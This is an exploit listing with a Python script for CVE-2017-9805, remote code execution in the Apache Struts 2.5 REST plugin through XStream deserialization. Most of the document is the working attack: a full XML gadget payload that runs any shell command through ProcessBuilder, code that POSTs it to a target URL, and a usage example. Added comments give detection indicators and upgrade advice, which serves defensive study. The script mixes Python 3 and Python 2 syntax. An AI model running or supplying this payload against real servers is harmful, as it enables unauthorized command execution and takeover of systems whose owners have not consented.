Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution

Related Vulnerabilities: CVE-2017-9805  
Publish Date: 06 Sep 2017
Author: Warflop
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 – Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805

#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps &amp; G4mbl3r
# *****************************************************
import requests
import sys

def exploration(command):
	"""Send the CVE-2017-9805 XStream document to the target and print the reply.

	The body below is an XML document that the Struts REST plugin hands to
	XStream; its nested elements describe a java.lang.ProcessBuilder whose
	``start`` method is named inside a javax.imageio.ImageIO$ContainsFilter,
	with ``command`` spliced in verbatim as the argument to ``/bin/sh -c``.
	The document is POSTed with ``Content-Type: application/xml`` to the URL
	taken from ``sys.argv[1]`` and the HTTP response body is printed unmodified.

	Args:
		command: shell command string interpolated as-is into the XML.

	Defender notes (review):
		- The usable indicators are the ``application/xml`` content type on a
		  REST-plugin action together with a body naming classes such as
		  ``jdk.nashorn.internal.objects.NativeString``,
		  ``javax.crypto.CipherInputStream`` and ``java.lang.ProcessBuilder``;
		  the fixed desktop-browser User-Agent below carries no signal on its
		  own.
		- The file header lists Struts 2.5 through 2.5.12 as affected, so
		  remediation is upgrading beyond that range (later releases restrict
		  the types XStream will deserialize -- confirm against the vendor
		  advisory for this CVE) and not exposing the REST plugin where it is
		  not needed.
	"""

	exploit = '''
				&lt;map&gt;
				&lt;entry&gt;
				&lt;jdk.nashorn.internal.objects.NativeString&gt;
				&lt;flags&gt;0&lt;/flags&gt;
				&lt;value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data"&gt;
				&lt;dataHandler&gt;
				&lt;dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"&gt;
				&lt;is class="javax.crypto.CipherInputStream"&gt;
				&lt;cipher class="javax.crypto.NullCipher"&gt;
				&lt;initialized&gt;false&lt;/initialized&gt;
				&lt;opmode&gt;0&lt;/opmode&gt;
				&lt;serviceIterator class="javax.imageio.spi.FilterIterator"&gt;
				&lt;iter class="javax.imageio.spi.FilterIterator"&gt;
				&lt;iter class="java.util.Collections$EmptyIterator"/&gt;
				&lt;next class="java.lang.ProcessBuilder"&gt;
				&lt;command&gt;
				&lt;string&gt;/bin/sh&lt;/string&gt;&lt;string&gt;-c&lt;/string&gt;&lt;string&gt;'''+ command +'''&lt;/string&gt;
				&lt;/command&gt;
				&lt;redirectErrorStream&gt;false&lt;/redirectErrorStream&gt;
				&lt;/next&gt;
				&lt;/iter&gt;
				&lt;filter class="javax.imageio.ImageIO$ContainsFilter"&gt;
				&lt;method&gt;
				&lt;class&gt;java.lang.ProcessBuilder&lt;/class&gt;
				&lt;name&gt;start&lt;/name&gt;
				&lt;parameter-types/&gt;
				&lt;/method&gt;
				&lt;name&gt;foo&lt;/name&gt;
				&lt;/filter&gt;
				&lt;next class="string"&gt;foo&lt;/next&gt;
				&lt;/serviceIterator&gt;
				&lt;lock/&gt;
				&lt;/cipher&gt;
				&lt;input class="java.lang.ProcessBuilder$NullInputStream"/&gt;
				&lt;ibuffer/&gt;
				&lt;done&gt;false&lt;/done&gt;
				&lt;ostart&gt;0&lt;/ostart&gt;
				&lt;ofinish&gt;0&lt;/ofinish&gt;
				&lt;closed&gt;false&lt;/closed&gt;
				&lt;/is&gt;
				&lt;consumed&gt;false&lt;/consumed&gt;
				&lt;/dataSource&gt;
				&lt;transferFlavors/&gt;
				&lt;/dataHandler&gt;
				&lt;dataLen&gt;0&lt;/dataLen&gt;
				&lt;/value&gt;
				&lt;/jdk.nashorn.internal.objects.NativeString&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;/entry&gt;
				&lt;entry&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/&gt;
				&lt;/entry&gt;
				&lt;/map&gt;
				'''


	# Target URL is read from argv here rather than taken as a parameter, so
	# this function cannot be called without a populated sys.argv.
	url = sys.argv[1]

	# Fixed browser User-Agent; the Content-Type is what the server-side
	# handler (and any request inspection) actually keys on.
	headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
			'Content-Type': 'application/xml'}

	# Single POST; the response body is echoed raw, whatever it contains.
	request = requests.post(url, data=exploit, headers=headers)
	print request.text

# Script entry: expects URL and COMMAND as the two positional arguments;
# anything less prints the banner/usage and exits.
if len(sys.argv) &lt; 3:
	print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
	print ('[*] Warflop - http://securityattack.com.br')
	print ('[*] Greatz: Pimps &amp; G4mbl3r')
	print ('[*] Use: python struts2.py URL COMMAND')
	print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
	exit(0)
else:
	# Only the command is passed explicitly; exploration() reads the URL
	# from sys.argv[1] itself.
	exploration(sys.argv[2])